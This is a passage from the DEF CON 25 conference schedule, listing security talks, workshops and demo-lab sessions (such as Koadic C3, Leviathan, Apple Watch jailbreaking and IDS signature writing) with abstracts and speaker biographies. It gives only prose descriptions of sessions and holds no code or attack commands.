Jason is the Head of Trust and Security at Bugcrowd. Jason trains and works with internal security engineers to triage and validate hardcore vulnerabilities in mobile, web, and IoT applications/devices. He also works with Bugcrowd to improve the security industries relations with the researchers. Jason's interests and areas of expertise include mobile penetration testing, black box web application auditing, network/infrastructure security assessments, and static analysis. Jason lives in Santa Barbara with his wife and three children. Before joining Bugcrowd Jason was the Director of Penetration Testing for HP Fortify and also held the #1 rank on the Bugcrowd leaderboard for 2014.

@jhaddix

Contributor Acknowledgement:
The Speaker would like to acknowledge the following for their contribution to the presentation.

JP Villanueva is a Trust & Security Engineer at Bugcrowd. Before Bugcrowd, JP spent 2 years as an Application Security Engineer and another 2 years as a Solutions Architect at WhiteHat Security helping customers become more secure. JP has also presented at OWASP and Interop DarkReading events. In his free time, JP enjoys playing classic video games and hacking on bug bounty programs.

Fatih is an Application Security Engineer at Bugcrowd and Bug Hunter located in Istanbul/Turkey. Before Bugcrowd, he was a security consultant at InnoveraBT and performed penetration testing for clients including government, banks, trade, and finance companies. His expertise includes network, web applications, mobile security assessments, and auditing. He also holds OSCP, OSCE, GWAPT certifications.

Ryan Black is the Director of Technical Operations at Bugcrowd where he heads strategy and operations for the Application Security Engineering team. This group reviews and validates tens of thousands of vulnerability reports to bug bounty programs.

Prior to joining Bugcrowd, Ryan developed and led the static analysis and code review team for HP Fortify on Demand, later expanding to DevOps tooling and integrations for the enterprise. He has also held various InfoSec and technology positions at companies such as Aflac and Apple in the last decade. In addition to professional experience, he holds several industry certifications and participates in a variety of open source software projects and initiatives. On personal time he enjoys coding, gaming, various crafts, and nature activities with his wife, two kids, and three dogs.

Vishal Shah is an Application Security Engineer specializing in web and mobile security at Bugcrowd. Prior to Bugcrowd, Vishal spent time as a Security Consultant with Cigital hacking and building automation for hackers. In his free time, Vishal enjoys working out, CTFs, and playing video games.


Return to Index      -     

 

PHW - Neopolitan BR IV - Promenade Level - Friday - 19:00-20:30


Introducing Mallet: An Intercepting Proxy for Arbitrary Protocols


Dane Goodwin

When it comes to HTTP interception, the tools of the trade are excellent. However, setting up an intercepting proxy for protocols other than HTTP can be time consuming and difficult. To address this gap, we've created a new proxy, which allows you to define a new protocol on the fly using Netty's built-in protocol encoders and decoders, as well as being able to create your own using the existing Netty libraries. Once defined, you can interact with the objects in real-time, modifying objects and properties as you see fit.
 This workshop will give you hands on experience with our new proxy.

Dane Goodwin (Twitter: @@dane_goodwin) has worked as a pentester for ~4 years, after deciding a career in development wasn't for him. He's presented some coolness at ZaCon, BSides Cape Town, and BlackHat Arsenal 2016. While not cycling, he currently spends his time learning all things SDR.



Return to Index      -     

 

VMHV - Roman 1, Promenade Level - Friday - 11:00-11:45


Title:
Introduction into hacking the equipment in the village.

Title: Introduction into hacking the equipment in the village


Sandy Clark Bio
Sandy Clark
Ph.D Student, Computer Science, University of Pennsylvania

Sandy Clark is a graduate Student(Ph.D.) in computer and information science at the University of Pennsylvania. Her research focuses on computer security and privacy, with an emphasis on computer security as an ecosystem. Much of her work explores solutions to computer security problems from non-traditional disciplines. She also focuses on software security, user and data privacy, anonymity, computer human interaction, ethics, and cybercrime, malware evolution and the security arms race. Most recently, her works have also focused on the interaction of technology with law, governmental regulation, and international affairs.

Harri Hursti bio
Harri Hursti, Subject Matter Expert & Co-founder of ROMmon

Matt Blaze bio
Matt Blaze, Cryptographer & Associate Professor of Computer & Information Science at University of Pennsylvania

Matt Blaze is a professor at the University of Pennsylvania, where he directs the Distributed Systems Lab and conducts research in security, privacy, surveillance, cryptography, scale, and the relationship between technology and public policy. His work has included the discovery of fundamental flaws in the Clipper chip and other surveillance systems, foundational work in network security, file encryption, trust management and two way radio security, and security evaluations of major electronic voting systems in used in the US.

Mr. Harri Hursti, Founding Partner Nordic Innovation Labs, is a world-renowned data security expert, internet visionary and serial entrepreneur. He began his career as the prodigy behind the first commercial, public email and online forum system in Scandinavia. He founded his first company at the age of 13 and went on to cofound EUnet-Finland in his mid- 20s. Today, Harri continues to innovate and find solutions to the worlds most vexing problems. He is among the worlds leading authority in the areas of election voting security and critical infrastructure and network system security.

Return to Index      -     

 

PHW - Neopolitan BR IV - Promenade Level - Sunday - 13:00-14:30


Introduction to 802.11 Packet Dissection

Megumi Takeshita, aka Packet Otaku, Ikeriri Network Service Co.,Ltd.

Have you ever wanted to capture, filter, examine, visualize, decrypted and followed sequences of 802.11 packets? This workshop demonstrates a typical and basic work flow of wireless packet analysis. This workshop will cover basic wireless packet analysis, using Wireshark, to examine the internals of 802.11 frames including the Radiotap header, looking at the importance and meaning of the fields, mark packets and understand processes of the link layer, input the decryption key for WPA2 to explore WPA2-PSK frames and how to create graphs to visualize the stats of a wireless network.

Megumi Takeshita, or Packet Otaku (Twitter: @ikeriri) runs a packet analysis company, Ikeriri Network Service, after having worked at BayNetworks and Nortel Networks in Japan. Ikeriri Network Service is a reseller of many wired/wireless capture and analysis devices and software for Riverbed, Metageek, Profitap, Dualcomm etc. Megumi has authored 18+ books about Wireshark and packet analysis in Japanese. She is a contributor to the Wireshark project and has presented multiple times at SharkFest, Interopt Tokyo and other conferences.


Return to Index      -     

 

PHW - Neopolitan BR IV - Promenade Level - Saturday - 14:30-15:59


Introduction to 802.11 Packet Dissection

Megumi Takeshita, aka Packet Otaku, Ikeriri Network Service Co.,Ltd.

Have you ever wanted to capture, filter, examine, visualize, decrypted and followed sequences of 802.11 packets? This workshop demonstrates a typical and basic work flow of wireless packet analysis. This workshop will cover basic wireless packet analysis, using Wireshark, to examine the internals of 802.11 frames including the Radiotap header, looking at the importance and meaning of the fields, mark packets and understand processes of the link layer, input the decryption key for WPA2 to explore WPA2-PSK frames and how to create graphs to visualize the stats of a wireless network.

Megumi Takeshita, or Packet Otaku (Twitter: @ikeriri) runs a packet analysis company, Ikeriri Network Service, after having worked at BayNetworks and Nortel Networks in Japan. Ikeriri Network Service is a reseller of many wired/wireless capture and analysis devices and software for Riverbed, Metageek, Profitap, Dualcomm etc. Megumi has authored 18+ books about Wireshark and packet analysis in Japanese. She is a contributor to the Wireshark project and has presented multiple times at SharkFest, Interopt Tokyo and other conferences.


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 6 - Thursday - 10:30-14:30


Introduction to Cryptographic Attacks

Thursday, 10:30 to 14:30 in Octavius 6

Matt Cheung

Cryptography can seem like a mysterious black box making attacks even more mysterious. Introduction to Cryptographic Attacks is for those who have no experience with cryptographic attacks and how they work. In this workshop you will learn how simple some of these attacks are, and you will build a foundation in cryptographic primitives and potential weak points of real world systems.

The workshop will lead attendees through CTF style crypto challenges that illustrate critical cryptographic weaknesses. I recommend coming prepared with a Python environment and the following modules: cryptography or PyCrypto, gmpy2 (requires installing gmp), and requests.

Prerequisites: None, though some moderate math and programming experience is useful.

Materials: Laptop installed with Python as I will have some code snippets to help with the exercises.

Max students: 30 | Registration: https://dc25_cheung.eventbrite.com (Sold out!)

Matt Cheung
Matt Cheung started developing his interest in cryptography during an internship in 2011. He worked on implementation of a secure multi-party protocol by adding elliptic curve support to an existing secure text pattern matching protocol. Implementation weaknesses were not a priority and this concerned Matt. This concern prompted him to learn about cryptographic attacks from Dan Boneh's crypto 1 course offered on Coursera and the Matasano/cryptopals challenges. From this experience he has given talks and workshops at the Boston Application Security Conference and the DEF CON Crypto and Privacy Village.


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 6 - Thursday - 14:30-18:30


Introduction to Practical Network Signature Development for Open Source IDS

Thursday, 14:30 to 18:30 in Octavius 6

Jack Mott Researcher, Proofpoint

Jason Williams Researcher, Proofpoint

"In "Introduction to Practical Network Signature Development for Open Source IDS" we will teach expert methods and techniques for writing network signatures to efficiently detect the greatest threats facing organizations today. This class is designed for an analyst who spends their days investigating and responding to network IDS alerts and has something everyone can take back with them-- entry level or expert. Students will gain invaluable information and knowledge including usage, theory, malware traffic analysis fundamentals, and enhanced signature writing, for Open Source IDS such as Suricata and Snort. Student will be given handouts to help them develop and read with IDS signatures. Lab exercises will train students how to analyze and interpret hostile network traffic into agile IDS rules for detecting threats, including but not limited to: Exploit Kits, Ransomware, Phishing Attacks, Crimeware Backdoors, Targeted Threats, and more. Students will leave the class armed with the knowledge of how to write quality IDS signatures for their environment, enhancing their organization's ability to respond and detect threats.

Prerequisites: Familiarity with TCP/IP, familiarity with packet analysis tools (Wireshark, etc), Basic Malware Analysis fundamentals.

Materials: Nothing required, but if the student wishes, they may bring a computer capable of analyzing PCAPs and running Snort or Suricata to follow along with the presentation. Labs are provided for after class / take home practice.

Max students: 30 | Registration: https://dc25_mott.eventbrite.com (Sold out!)

Jack Mott
Jack is a Security Researcher on the Emerging Threats Research team at Proofpoint where he spends all day long in packet-land playing with malware and writing comprehensive IDS rules for the ETPRO and OPEN ruleset. In addition to IDS sigs, writes sigs for ClamAV and Yara to hunt, detect, and analyze internet-borne threats. Jack loves analyzing exploit kits, malicious docs, and ransomware. Jack is a core member and trainer with the non-profit Open Information Security Foundation (OISF) and works closely with the developers of Suricata. Additionally, Jack has spoken at various educational institutions and information security conferences on malware related topics.

Jason Williams
Jason is a Security Researcher on the Emerging Threats Research team at Proofpoint where he flops around in a metaphorical ball pit of network packets all day and night. He works on the ETPRO and OPEN rulesets, having written over four thousand signatures. He loves turning malware inside out and fights phishers and scammers 24/7. Seriously. He hates em. I once saw him 360 noscope 3 at once. I'm getting off topic. Outside of his work automating phishing research, he also works on Red Onion - a Centos/Redhat centric NSM solution combining Suricata, Bro, and Moloch. Jason is a core member and trainer with the non-profit Open Information Security Foundation (OISF) and works closely with the developers of Suricata. Jason has trained at Derbycon and spoken at Thotcon as well as various educational institutes on forensic and malware related topics.


Return to Index      -     

 

ICS - ICS-Village - Friday - 11:30-11:59


Introduction to the ICS Wall - Tom Van Norman
Title: Introduction to the ICS Wall

No description available

Bio: Tom Van Norman

No BIO available


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 5 - Friday - 10:30-14:30


Introduction to x86 disassembly

Friday, 10:30 to 14:30 in Octavius 5

DazzleCatDuo

Jumping into the world of disassembly can be incredibly intimidating and quite painful. This talk aims to introduce disassembly by walking through how to recognize basic logic flows and data structures in assembly. We'll look at locating common flow controllers such as if/else/loops/switch cases, as well as data structures. The talk will specifically address static disassembly using IDA, looking at c compiled to x86_32, but the principles can be applied to any other language and assembly architecture. x86, is one of the most common assembly architectures, and incredibly useful for security engineers to understand. x86 is the assembly architecture running almost all Mac, Windows, and Linux computers.

Prerequisites: Students must have a basic coding knowledge, and understand what if/else/loops/switches logically do, in any coding language.

Materials: Please bring a laptop with Virtual Box (latest version) and at least 20 gigs of free disk space. VM's with examples and tools will be distributed in class via USB sticks.

Max students: 90 | Registration: https://dc25_dazzlecatduo.eventbrite.com (Sold out!)

DazzleCatDuo
The DazzleCatDuo are both security engineers who specialize in x86 research.


Return to Index      -     

 

IOT - Main Contest Area - Friday - 16:10-16:59



Return to Index      -     

 

BHV - Pisa Room - Saturday - 13:30-13:59


Title: IoT of Dongs

Speaker: RenderMan


About RenderMan:
Canadian born and raised. He hacks banks during the day and other random things at night (currently sex toys). His interests are very diverse and people seem to like to hear about his work as much as he enjoys sharing it. This has allowed him to speak at conferences and events all over the world and even change it a few times.
Often near infosec news or causing it himself, he can be found on twitter at @ihackedwhat and @internetofdongs

Abstract:
Among ‘Internet of Things’ security research, there is one branch that no one has wanted to touch, until now: The Internet of Dongs. Internet connected sex toys in all shapes, sizes and capabilities are available on the market with many more being developed. Like many IoT devices, IoD devices suffer a great many security and privacy vulnerabilities. These issues are all the more important when you consider the private and intimate nature of these devices. To research this, the Internet of Dongs project was founded (https://internetofdon.gs).
This talk will explore this under researched branch of IoT and the security and privacy threats that exist. It will also cover the IoD projects efforts to bring information security best practices to the adult toy industry.



Return to Index      -     

 

IOT - Main Contest Area - Saturday - 23:30-24:20



Return to Index      -     

 

IOT - Main Contest Area - Friday - 23:30-24:20



Return to Index      -     

 

PHV - Milano VIII - Promenade Level - Friday - 15:10-15:59


IP Spoofing

Marek Majkowski, Cloudflare

At Cloudflare we deal with DDoS attacks every day. Over the years, we've gained a lot of experience in defending from all different kinds of threats. We have found that the largest attacks that cause the internet infrastructure to burn are only possible due to IP spoofing.

In this talk we'll discuss what we learned about the L3 (Layer 3 OSI stack) IP spoofing. We'll explain why L3 attacks are even possible in today's internet and what direct and reflected L3 attacks look like. We'll describe our attempts to trace the IP spoofing and why attack attribution is so hard. Our architecture allows us to perform most attack mitigations in software. We'll explain a couple of effective L3 mitigation techniques we've developed to stop our servers burning.

While L3 attacks are a real danger to the internet, they don't need to be. With a bit of cooperation and couple of technical tricks maybe we can fix the IP spoofing problem for all.

Marek Majkowski (Twitter: @majek04). After fruitful encounters with such diverse topics as high performance key value databases, distributed queueing systems, making real time web communication enjoyable, and accelerating the time so that testing servers and protocols takes seconds, Marek Majkowski finally settled for working on DDoS mitigation in the CloudFlare London office, where he appreciates most the parking space for his motorbike.


Return to Index      -     

 

PHV - Milano VIII - Promenade Level - Friday - 12:10-12:59


Iron Sights for Your Data

Leah Figueroa

Data breaches have become all too common. Major security incidents typically occur at least once a month. With the rise of both security incidents and full data breaches, blue teams are often left scrambling to put out fires and defend themselves without enough information. This is something that can be changed with the right tools. Tools now available allow blue teams to weaponize data and use it to their advantage. This talk reviews frameworks for clean, consistent data collection and provides an overview of how predictive analytics works, from data collection to data mining to predictive analytics to forecasts. The allows the blue team to focus on potential risks instead of trying to put out every fire.

Leah Figueroa (Twitter: @Sweet_Grrl) is a 13 year veteran of the data analytics field and works as a data analyst in higher education. She holds a Master's in Education, an ABD in research psychology, and taught kindergarten. A data aficionado, Leah focuses on research on improving students' outcomes at the higher education level, including focusing on both minority students issues as well as issues pertaining to students who come from a background of poverty. While not at work, Leah is interested in improving blue teams by helping bring data analytics into the team. Leah also enjoys being a fiber artist (knitter), loves cats, InfoSec, picking locks, cooking, and reading.


Return to Index      -     

 

SKY - Verona/Tuin/Trevi - Promenade Level - Sunday - 11:00-11:59


Title:
Its Not Just the Elections!

1100 Sunday
Malware Utkonos
@MalwareUtkonos
Its Not Just the Elections!

"Sofacy, APT28, Fancy Bear, or whatever one wishes to refer to them by, have been working overtime on meddling with elections. The first major news cycle election that came under attack was the 2016 US Presidential elections. Months later, the same group has set their sights on the 2017 French elections. It seems that election hacking has become a central danger to modern society. Unfortunately, it is not the only danger. Attacks by the same type of adversary that target individuals such as journalists and activists are just as dangerous, and in many ways more insidious. The greatest difficulty for targets like these is they dont have SOCs, IR teams, threat intelligence teams, security engineers, or a CISO. Some of them may be fortunate to have non-profits looking after them if they get spear-phished. Others may even be working with private industry and vendors for assistance. Throughout this process, it can be difficult to interact with and effectively collect all the data needed to triage a phish and get information back to the individual about what it is and potentially who may be behind it.

The tool that we have developed has quite a boring name: Help Site. We didnt want to name it something scary or cloak-and-dagger: what were working on has more that enough of that to go around. The long and short of it is we have developed a canned web server using Vagrant and open source software that allows journalists, activists, dissidents, and others who are under attack to safely report phishing and malware attacks to organizations that can help them. In addition to the ability to submit components of an attack for analysis, there is a growing library of instructions for how to extract an email with full headers from a multitude of common email clients. In this talk, viewers will leave with an understanding of why such a system is needed to distance the attack surface and contain it, as well as some of the work that we did leading up to this project."

Return to Index      -     

 

RCV - Palermo room, Promenade level - Friday - 14:20-14:55


Keynote: It’s Going To Get Worse Before It Gets Better - The Future of Recon Data Mining

The OSINT and reconnaissance landscape is beginning to face some challenges. Current valuable sources such as open sourced lists are already facing offensive and malicious data poisoning. Privacy laws are creating barriers in many areas, and as court rulings are levying increasing fines for playing fast and loose with user data privacy. Social media companies are starting to realize that they actually need to start making profits, and are restricting their data.

Sites are aggressively combating web crawling, services like TOR and VPN face uncertain futures, the list of potential hurdles to the future of OSINT and recon seems grim. But fear not. There is still hope - and plenty of it. This presentation will discuss both the challenges and changes to both offensive and defensive reconnaissance that the presenter believes we will see in the future, and strategies that will help mitigate or enhance these changes.

Speaker Profile

Shane MacDougall tactical_intel is a two-time winner of the Defcon Social Engineering Capture The Flag, and has placed in the top three of the attack portion in every year of the contest’s existence. He is a principal partner in Tactical Intelligence, a boutique InfoSec consulting firm in Canada that specializes in social engineering, corporate information gathering, and red team attacks. Mr. MacDougall started in the computer security field in 1989 as a penetration tester with KPMG, and worked on the attacking side of the field until 2002, when he joined ID Analytics, the world’s largest anti-identity theft detection company as the head of information security. In 2011 he left the firm to start his own company. Mr. MacDougall has presented at several security conferences, including BlackHat EU, BSides Las Vegas, DerbyCon, LASCON, and ToorCon. He is currently doing research in the areas of integrating near-realtime OSINT into IDS/SIEM, as well as the generation of a real-time pre-text generator.


Return to Index      -     

 

DEFCON - Track 2 - Thursday - 12:00-12:45


Jailbreaking Apple Watch

Thursday at 12:00 in 101 Track 2

45 minutes | Demo

Max Bazaliy Security Researcher, Lookout

On April 24, 2015, Apple launched themselves into the wearables category with the introduction of Apple Watch. This June, at Apple's Worldwide Developer Conference, Apple announced that their watch is not only the #1 selling smartwatch worldwide by far, but also announced the introduction of new capabilities that will come with the release of watchOS 4. Like other devices, Apple Watch contains highly sensitive user data such as email and text messages, contacts, GPS and more, and like other devices and operating systems, has become a target for malicious activity.

This talk will provide an overview of Apple Watch and watchOS security mechanisms including codesign enforcement, sandboxing, memory protections and more. We will cover vulnerabilities and exploitation details and dive into the techniques used in creating an Apple Watch jailbreak. This will ultimately lead to a demonstration and explanation of jailbreaking an Apple Watch, showcasing how it can access important user data and applications.

Max Bazaliy
Max is a Security Researcher at Lookout with more than ten years of experience in areas as reverse engineering, software security, vulnerability research and advanced exploitation. Currently focusing on iOS exploitation, reverse engineering advanced mobile malware and hardware attacks. Max was a lead security researcher at Pegasus iOS malware investigation.

In the past few years, Max was a speaker on various security conferences, including BlackHat, CCC, DEF CON , Ruxcon, RSA and BSides.

Max holds a Masters degree in Computer Science and currently is PhD student at the National Technical University of Ukraine "Kyiv Polytechnic Institute" where he'working on dissertation in code obfuscation and privacy area.

@mbazaliy


Return to Index      -     

 

PHW - Neopolitan BR IV - Promenade Level - Friday - 17:00-18:30


Linux Lockdown: Jailing Programs with Linux Containers

Jay Beale, CTO and COO at InGuardians

Taught by Bastille Linux creator Jay Beale, this hands-on workshop will teach you to use Linux containers to better contain an attack on any program running on the system. You will be given a vulnerable program to protect, via a virtual machine that you can download beforehand. You will first compromise the application, then contain it and exploit it again. We'll discuss AppArmor, seccomp and SELinux, and you'll be able to download the virtual machines to try more advanced versions of this afterward. For purposes of ease, we'll use Docker, but you can take the concepts home and try them with LXC/LXD, runc, or another framework for managing containers. This workshop is being taught for the first time and provides one topic from the long-running Black Hat class, "Aikido on the Command Line.”

Jay Beale (Twitter: @jaybeale and @inguardians) has been working in Linux security since 1999, when he began creating several defensive security tools, including Bastille Linux/UNIX and the CIS Linux Scoring Tool, both of which were used widely throughout industry and government. He has served as an invited speaker at many industry and government conferences, a columnist for Information Security Magazine, SecurityPortal and SecurityFocus, and a contributor to nine books, including those in his Open Source Security Series and the "Stealing the Network" series. He has been invited to speak at and chair conferences around the world. His first talk at Def Con was in 2000. Jay is a founder and both the CTO and Chief Operating Officer of the information security consulting company InGuardians.


Return to Index      -     

 

PHW - Neopolitan BR IV - Promenade Level - Saturday - 12:30-13:59


Linux Lockdown: Jailing Programs with Linux Containers

Jay Beale, CTO and COO at InGuardians

Taught by Bastille Linux creator Jay Beale, this hands-on workshop will teach you to use Linux containers to better contain an attack on any program running on the system. You will be given a vulnerable program to protect, via a virtual machine that you can download beforehand. You will first compromise the application, then contain it and exploit it again. We'll discuss AppArmor, seccomp and SELinux, and you'll be able to download the virtual machines to try more advanced versions of this afterward. For purposes of ease, we'll use Docker, but you can take the concepts home and try them with LXC/LXD, runc, or another framework for managing containers. This workshop is being taught for the first time and provides one topic from the long-running Black Hat class, "Aikido on the Command Line.”

Jay Beale (Twitter: @jaybeale and @inguardians) has been working in Linux security since 1999, when he began creating several defensive security tools, including Bastille Linux/UNIX and the CIS Linux Scoring Tool, both of which were used widely throughout industry and government. He has served as an invited speaker at many industry and government conferences, a columnist for Information Security Magazine, SecurityPortal and SecurityFocus, and a contributor to nine books, including those in his Open Source Security Series and the "Stealing the Network" series. He has been invited to speak at and chair conferences around the world. His first talk at Def Con was in 2000. Jay is a founder and both the CTO and Chief Operating Officer of the information security consulting company InGuardians.


Return to Index      -     

 

DEFCON - Track 2 - Saturday - 13:00-13:45


Koadic C3 - Windows COM Command & Control Framework

Saturday at 13:00 in Track 2

45 minutes | Demo, Tool

Sean Dillon (zerosum0x0) Senior Security Analyst, RiskSense, Inc.

Zach Harding (Aleph-Naught-) Senior Security Analyst, RiskSense, Inc.

Koadic C3, or COM Command & Control, is a Windows post-exploitation tool similar to other penetration testing rootkits such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using the Windows Script Host (a.k.a. JScript/VBScript), with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.

An in-depth view of default COM objects will be provided. COM is a fairly underexplored, large attack surface in Windows. We will share lots of weird Windows scripting quirks with interesting workarounds we discovered during the course of development. Post exploitation with PowerShell has grown in popularity in recent years, and seeing what can be done with just the basic Windows Script Host is an interesting exploration. In addition, defenses against this type of tool will be discussed, as the Windows Script Host is more tightly coupled to the core of Windows than PowerShell is.

It is possible to serve payloads completely in memory from stage 0 to beyond, as well as use cryptographically secure communications over SSL and TLS (depending on what the victim OS has available). We also found numerous ways to "fork to shellcode" in an environment which traditionally does not provide such capabilities. This talk is based on original research by ourselves, as well as the previous amazing work of engima0x3, subTee, tiraniddo, and others.

Sean Dillon (zerosum0x0)
Sean Dillon is a senior security analyst at RiskSense, Inc. He has an established research focus on attacking the Windows kernel, and was the first to reverse engineer the DOUBLEPULSAR SMB backdoor. He is a co-author of the ETERNALBLUE Metasploit module and contributions to the project. He has previously been a software engineer in the avionics and insurance industries, and his favorite IDE is still GW-Basic on DOS.

https://twitter.com/zerosum0x0
https://zerosum0x0.blogspot.com
https://github.com/zerosum0x0

Zach Harding (Aleph-Naught-)
Zach Harding is a senior security analyst at RiskSense, Inc. Zach formerly served in the US Army as a combat medic. He, along with Sean Dillon and others, improved leaked NSA code to release the "ExtraBacon 2.0" Cisco ASA exploit package. He is an avid tester of every penetration tool he can get a hold of. You know the guy who's always looking for available public WiFi, or fiddling with a kiosk machine? That's Zach.

https://github.com/Aleph-Naught-


Return to Index      -     

 

Demolabs - Table 1 - Saturday - 12:00-13:50


LAMMA 1.0

Antriksh Shah

Ajit Hatti

Saturday from 1200-1350 at Table One

Audience: Cryptologist, crypt analysts, developers and testers, Block Chain and PKI Implements.

Last year we released LAMMA Beta at DEFCON, this year we are bringing the updated version of LAMMA with new modules for BlockChain Security Testing, auditing Trust stores, enhanced checks for source code analysis and logical flaws in crypto-coding. LAMMA 1.0 with new features & fixes makes crypto-testing more effective and smoother even for large scale implementations. You can use and enhance LAMMA 1.0, as it's a FREE and OPEN SOURCE.

http://www.securitymonx.com/products/lamma

Antriksh Shah
Antrksh is a Security Researchers from Goa. He is associated with null Open Security community and organizes Nullcon. His area of Interest are VAPT, Web app Security, Network Auditing and Forensics. Currently his research is focused on Security issues in Block Chain implementations and has contributed his work to enhance LAMMA.

Ajit Hatti
Ajit Hatti has been contributing on secure usage of cryptography from past 5 years and currently focusing on the security issues of BlockChain related Technologies. He is an author of LAMMA & GibberSense tools which help in securing crypto and PKI Implementatinos.

Ajit is founder of SecurityMonx and is also working in collaboration with Payatu on futuristic projects. He also co-founded Null Open Security Community and has worked with Symantec, Emerson, ZScaler, IBM and Bluelane as a Security Researcher.

Ajit has presented his work at BlackHat DEFCON Crypto-n-Privacy Village and organizes Nullcon in India. He loves to Run & Volunteer at BSides LV and organizes The World Run by Hackers.


Return to Index      -     

 

Wireless - Florentine BR I & II - Promenade Level - Saturday - 15:00-15:55


Alexander Zakharov

Bio

Alexander has over 25 years of experience in the Telecommunications, Information Technology and IT Security fields. He was responsible for the creation and deployment of solutions protecting networks, systems and information assets for a large number of organizations in both the private and public sectors. Alexander also managed numerous projects in the areas of Internet technologies, system integration, distributed computing, embedded designs, wired and wireless data and voice communications. He earned a Master of Science in Mechanics with Majors in Robotics, Cybernetics and Automated Control Systems, and holds the following key professional certifications in the IT Security field: CISSP, ISSAP, CAP, CEH, CISA, CISM, CRISK, PI, COBIT, EMCDSA, and ITIL.

@alftelsystems

Large Scale Wireless Monitoring - KISMET packet sniffer on a multi-radio array

Abstract

This presentation will walk audience through and explain recently developed Kismet features that greatly benefit multiple radio cards setup. Support for multiple devices allows smarter splitting across them, including separate discovery and tracking activities, as well as dedicating certain radios to targeted bands and channels ranges. Coming Kismet release (currently under development, slated to be released shortly) has new and very flexible configuration options targeting utilization of multiple sources of radio data during passive scan and tracking. Live presentation will use ALFTEL Systems Ltd. Airbud appliance with x8 radio cards setup and latest Kismet sniffer software.


Return to Index      -     

 

Night Life - Counsel Boardroom, Promenade Level - Saturday - 18:00-19:00


Title:
Lawyer Meetup

Attention all lawyers, law students, and judges: The DEF CON Lawyer Meetup is BACK! We'll be meeting Saturday the 29th at 6pm in the Counsel Boardroom on the Promenade Level. Join us for conversation and merriment, followed by dinner for those interested in extending the experience.

See you there!
Return to Index      -     

 

PHV - Milano VIII - Promenade Level - Friday - 16:10-16:59


Layer 8 and Why People are the Most Important Security Tool

Damon Small, Technical Director, Security Consulting at NCC Group North America

People are the cause of many security problems, but people are also the most effective resource for combating them. Technology is critical, but without trained professionals, it is ineffective. In the context two case studies, the presenter will describe specific instances where human creativity and skill overcame technical deficiencies. The presenter believes this topic to be particularly relevant for the Packet Hacking Village, as many techniques used are the same that are pertinent for Capture the Packet and Packet Detective.

Technical details will include the specific tools used, screenshots of captured data, and analysis of the malware and the malicious user's activity. The goal of the presentation is show the importance of technical ability and critical thinking, and to demonstrate that skilled people are the most important tool in an information security program.

Damon Small (Twitter: @damonsmall) began his career studying music at Louisiana State University. Pursuing the changing job market, he took advantage of computer skills learned in the LSU recording studio to become a systems administrator in the mid 1990s. Following the dotcom bust in the early 2000s, Small began focusing on cyber security. This has remained his passion, and over the past 17 years as a security professional he has supported infosec initiatives in the healthcare, defense, and oil and gas industries. In addition to his Bachelor of Arts in Music, Small completed the Master of Science in Information Assurance degree from Norwich University in 2005. As Technical Director for NCC Group, Small has a particular interest in research and business development in the Healthcare and Oil and Gas industries. His role also includes working closely with NCC consultants and clients in delivering complex security assessments that meet varied business requirements.


Return to Index      -     

 

SKY - Verona/Tuin/Trevi - Promenade Level - Saturday - 10:00-10:59


Title:
Lessons From An Incident Responder AKA, Stories Of When Shit Goes Sideways

1000 Saturday
John Ives
Lessons From An Incident Responder AKA, Stories Of When Shit Goes Sideways

With nearly 20 years in IT and with over 13 of them in security on an open academic network, I have seen many things go wrong. While most issues are run of the mill events, there have been a number of times things have gone horribly wrong. This talk will use several true anecdotes (though names and locations may be altered) that highlight some issues that are rarely anticipated and will cover all stages of the IR process. As a bonus, you may also hear other tales of disaster like difficult e-discovery requirements and maybe even a tail of 0-day mismanagement.

Return to Index      -     

 

Demolabs - Table 4 - Sunday - 10:00-11:50


Leviathan Framework

Utku Sen

Ozge Barbaros

Sunday from 1000-1150 at Table Four

Audience: Red teamers, penetration testers (Offensive)

Leviathan is a mass audit toolkit which has wide range service discovery, brute force, SQL injection detection and running custom exploit capabilities. It consists open source tools such masscan, ncrack, dsss and gives you the flexibility of using them with a combination.

The main goal of this project is auditing as many system as possible in country-wide or in a wide IP range.

Github page: https://github.com/leviathan-framework/leviathan A blog post about it's custom exploit feature: https://www.utkusen.com/blog/wide-range-detection-of-doublepulsar-implants-with-leviathan.html

Utku Sen
Utku Sen is a security engineer working for Sony. He is the author of ransomware honeypot projects such as Hidden Tear and EDA2 which are featured in Forbes and Business Insider. Utku is mostly focused on following areas: Web application security, network security, tool development and bug hunting. He also nominated for Pwnie Awards on "Best Backdoor" category in 2016."

Ozge Barbaros
Ozge Barbaros is a security tools senior developer at Sony. Previously, she worked as GNU/Linux system administrator and as software developer at several companies in Turkey and studied Computer Engineering at Canakkale Onsekiz Mart University. She is interested in developing free software technologies.


Return to Index      -     

 

Workshops - ( Sold Out ) - Octavius 1 - Friday - 10:30-14:30


Linux Lockdown: ModSecurity and AppArmor

Friday, 10:30 to 14:30 in Octavius 1

Jay Beale Co-Founder and COO, InGuardians

Taught by Bastille Linux creator Jay Beale, this hands-on workshop will teach you to use AppArmor to contain an attack on any program running on the system and to use ModSecurity to protect a web application from compromise. You will be given a vulnerable command line program and a vulnerable web application to protect, via a virtual machine that you can download beforehand. You will first compromise the application, then build up a defense and attempt your attack again. This workshop is being taught for the first time and provides two topics from the long-running Black Hat class, "Aikido on the Command Line."

Prerequisites: Students should bring a working understanding of Linux.

Materials: Students should bring a laptop with VMware Player, Fusion or Workstation, with at least 8GB of RAM. The host operating system must be 64-bit. Students should also download the virtual machines and confirm that they run before the class begins.

Max students: 30 | Registration: https://dc25_beale.eventbrite.com (Sold out!)

Jay Beale
Jay Beale has created several defensive security tools, including Bastille Linux/UNIX and the CIS Linux Scoring Tool, both of which were used widely throughout industry and government. He has served as an invited speaker at many industry and government conferences, a columnist for Information Security Magazine, SecurityPortal and SecurityFocus, and a contributor to nine books, including those in his Open Source Security Series and the "Stealing the Network" series. He has been invited to speak at and chair conferences around the world. Jay is a founder and the Chief Operating Officer of the information security consulting company InGuardians.


Return to Index      -     

 

CHV - Village Talks Outside Contest Area, Pool Level - Saturday - 15:00-15:59


Linux-Stack Based V2X Framework: All You Need to Hack Connected Vehicles

No description available


Return to Index      -     

 

DEFCON - Track 3 - Saturday - 14:00-14:45


Linux-Stack Based V2X Framework: All You Need to Hack Connected Vehicles

Saturday at 14:00 in Track 3

45 minutes | Demo, Tool

